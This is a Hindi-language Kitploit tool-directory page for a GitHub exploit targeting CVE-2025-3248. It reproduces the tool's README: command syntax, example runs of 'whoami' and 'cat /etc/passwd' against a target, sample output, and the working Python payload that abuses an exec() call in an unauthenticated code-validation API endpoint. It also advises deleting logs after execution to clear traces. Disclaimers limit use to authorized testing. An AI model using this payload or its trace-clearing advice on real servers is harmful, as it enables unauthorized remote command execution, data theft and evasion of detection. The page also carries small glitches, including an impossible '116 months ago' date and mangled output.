Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
Log in
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-3248 — CVE-2025-3248 के लिए शोषण: लक्ष्य सर्वर पर मनमाने कमांड निष्पादित करने के लिए एक अप्रमाणित API कोड एंडपॉइंट में क्राफ्टेड Python पेलोड इंजेक्ट करता है। | Kitploit
उपकरण/GitHubGitHub/12-test-12/cve-2025-3248
भेद्यता विश्लेषणकोड विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगपेलोड डेवलपमेंट
GitHub12-test-12/cve-2025-3248

CVE-2025-3248

CVE-2025-3248 के लिए शोषण: लक्ष्य सर्वर पर मनमाने कमांड निष्पादित करने के लिए एक अप्रमाणित API कोड एंडपॉइंट में क्राफ्टेड Python पेलोड इंजेक्ट करता है।

रिपॉजिटरी देखें
116 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-3248 भेद्यता शोषण उपकरण दस्तावेज़ परिचय यह उपकरण CVE-2025-3248 भेद्यता (Python-आधारित कोड इंजेक्शन भेद्यता) का शोषण करने के लिए है, दुर्भावनापूर्ण पेलोड बनाकर लक्ष्य सर्वर पर रिमोट कमांड निष्पादन (RCE) प्राप्त करने के लिए। यह भेद्यता किसी वेब एप्लिकेशन के API इंटरफ़ेस में मौजूद है, हमलावर एक अनियंत्रित कोड निष्पादन बिंदु का उपयोग करके मनमाना Python कोड इंजेक्ट कर सकता है। महत्वपूर्ण सूचना: यह उपकरण केवल अधिकृत सुरक्षा परीक्षण के लिए है, अनधिकृत पैठ परीक्षण कानून का उल्लंघन कर सकता है। कृपया सुनिश्चित करें कि आपके पास लक्ष्य प्रणाली का स्पष्ट प्राधिकरण है। विशेषताएँ ✅ /api/v1/validate/code इंटरफ़ेस के माध्यम से दुर्भावनापूर्ण Python कोड इंजेक्ट करें ✅ मनमाने सिस्टम कमांड (जैसे whoami, ls आदि) निष्पादित करने का समर्थन करता है ✅ अनुकूलन योग्य टाइमआउट (डिफ़ॉल्ट 10 सेकंड) ✅ टेक्स्ट/JSON दो आउटपुट प्रारूपों का समर्थन करता है ✅ विस्तृत त्रुटि प्रबंधन और लॉग आउटपुट उपयोग विधि मूल सिंटैक्स bash

संपादित करें

python cve-2025-3248.py -t <目标URL> -c "<命令>" [选项] पैरामीटर विवरण पैरामीटर आवश्यक विवरण -t, --target हाँ लक्ष्य URL (प्रारूप: http://ip:port) -c, --command हाँ निष्पादित किया जाने वाला सिस्टम कमांड (उद्धरण में लपेटा जाना चाहिए) -o, --output नहीं आउटपुट प्रारूप (text/json, डिफ़ॉल्ट text) --timeout नहीं अनुरोध टाइमआउट (सेकंड, डिफ़ॉल्ट 10) -v, --verbose नहीं विस्तृत निष्पादन लॉग दिखाएँ उपयोग उदाहरण उदाहरण 1: whoami कमांड निष्पादित करें (डिफ़ॉल्ट आउटपुट प्रारूप) bash

संपादित करें

python cve-2025-3248.py -t http://192.168.1.100:7860 -c "whoami" आउटपुट उदाहरण: टेक्स्ट

संपादित करें

[+] कमांड निष्पादन सफल

www-data

उदाहरण 2: JSON प्रारूप आउटपुट + विस्तृत लॉग bash

संपादित करें

python cve-2025-3248.py -t https://app.example.com -c "cat /etc/passwd" -o json -v आउटपुट उदाहरण: json

संपादित करें

{ "status": 200, "content": "root❌0:0:root:/root:/bin/bash\n...", "success": true } भेद्यता सिद्धांत संक्षिप्त विश्लेषण लक्ष्य सेवा /api/v1/validate/code इंटरफ़ेस में code पैरामीटर प्राप्त करती है सर्वर-साइड इनपुट का सुरक्षा फ़िल्टर नहीं करता, सीधे exec() का उपयोग करके पारित Python कोड निष्पादित करता है हमलावर विशेष पेलोड बनाता है: python

संपादित करें

import os @exec("raise Exception(os.popen('whoami').read())") def f(): pass अपवाद प्रबंधन तंत्र के माध्यम से os.popen() चालू करके सिस्टम कमांड निष्पादित करता है भेद्यता जोखिम: यह भेद्यता सर्वर पर पूर्ण नियंत्रण का कारण बन सकती है, हमलावर मनमाने सिस्टम कमांड निष्पादित कर सकता है, संवेदनशील डेटा चुरा सकता है, बैकडोर स्थापित कर सकता है आदि। सुरक्षा चेतावनी ⚠️ यह उपकरण केवल अधिकृत पैठ परीक्षण के लिए है ⚠️ कानूनी जोखिम: स्पष्ट प्राधिकरण के बिना इस उपकरण का उपयोग करके पैठ परीक्षण करना कंप्यूटर धोखाधड़ी और दुरुपयोग अधिनियम जैसे कानूनों का उल्लंघन कर सकता है सिस्टम जोखिम: सिस्टम कमांड निष्पादित करने से सेवा क्रैश, डेटा हानि या सिस्टम डाउन हो सकता है पहचान जोखिम: आक्रमण गतिविधियाँ फ़ायरवॉल, IDS/IPS द्वारा पहचानी और लॉग की जा सकती हैं सुझाव: केवल नियंत्रित वातावरण (जैसे प्रयोगशाला, अधिकृत परीक्षण वातावरण) में उपयोग करें गलत संचालन से बचने के लिए -v पैरामीटर का उपयोग करके विस्तृत लॉग देखें निष्पादन के तुरंत बाद निशान साफ़ करें (जैसे लॉग हटाना, सत्र बंद करना) निर्भरता वातावरण Python 3.7+ requests लाइब्रेरी (पहले से स्थापित होनी चाहिए) bash

संपादित करें

pip install requests त्रुटि प्रबंधन विवरण त्रुटि कोड कारण समाधान [-] लक्ष्य URL प्रारूप त्रुटि URL में scheme या host गायब है URL प्रारूप जाँचें (जैसे http://127.0.0.1:8080) [-] अनुरोध टाइमआउट लक्ष्य प्रतिक्रिया समय समाप्त --timeout पैरामीटर मान बढ़ाएँ [-] कनेक्शन त्रुटि लक्ष्य अप्राप्य/फ़ायरवॉल अवरोधन नेटवर्क कनेक्टिविटी जाँचें [-] कमांड निष्पादन विफल HTTP स्थिति: 403 सर्वर-साइड अनुमति अस्वीकृत पुष्टि करें कि लक्ष्य सेवा कोड निष्पादन की अनुमति देती है तकनीकी विवरण भेद्यता स्थान: /api/v1/validate/code POST इंटरफ़ेस भेद्यता प्रकार: कोड इंजेक्शन (Code Injection) प्रभावित संस्करण: निर्दिष्ट नहीं (स्क्रिप्ट मानती है कि भेद्यता का संस्करण मौजूद है) सुधार सुझाव: इनपुट पर सख्त फ़िल्टरिंग लागू करें (exec/eval जैसे फ़ंक्शन प्रतिबंधित करें) उपयोगकर्ता इनपुट कोड निष्पादित करने के लिए सैंडबॉक्स वातावरण का उपयोग करें API इंटरफ़ेस के अनुमति दायरे को सीमित करें अस्वीकरण: यह दस्तावेज़ केवल सुरक्षा अनुसंधान और शैक्षिक उद्देश्यों के लिए है। लेखक इस उपकरण के उपयोग से होने वाली किसी भी प्रत्यक्ष या अप्रत्यक्ष हानि के लिए जिम्मेदार नहीं है। कृपया कानूनों और विनियमों का पालन करें, सुरक्षा उपकरणों का कानूनी रूप से उपयोग करें।

टूल डाउनलोड करें